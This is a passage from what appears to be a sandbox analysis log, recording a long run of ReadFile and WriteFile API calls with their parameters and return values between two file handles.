nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.495] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.497] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.498] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.500] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x251, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.501] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.503] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.504] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.504] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.506] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.508] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.510] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.512] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.514] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.514] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.516] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x369, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.517] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.518] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.518] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.519] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.521] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.522] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.522] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.523] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.523] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x221, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.524] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.524] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.525] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.525] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.526] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.526] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.527] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.527] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.528] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.528] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.529] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.529] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.531] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.531] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.532] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.533] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.534] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.534] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.535] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.535] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.537] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.537] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.538] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.538] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.539] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.539] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.541] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.541] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.543] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.544] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, 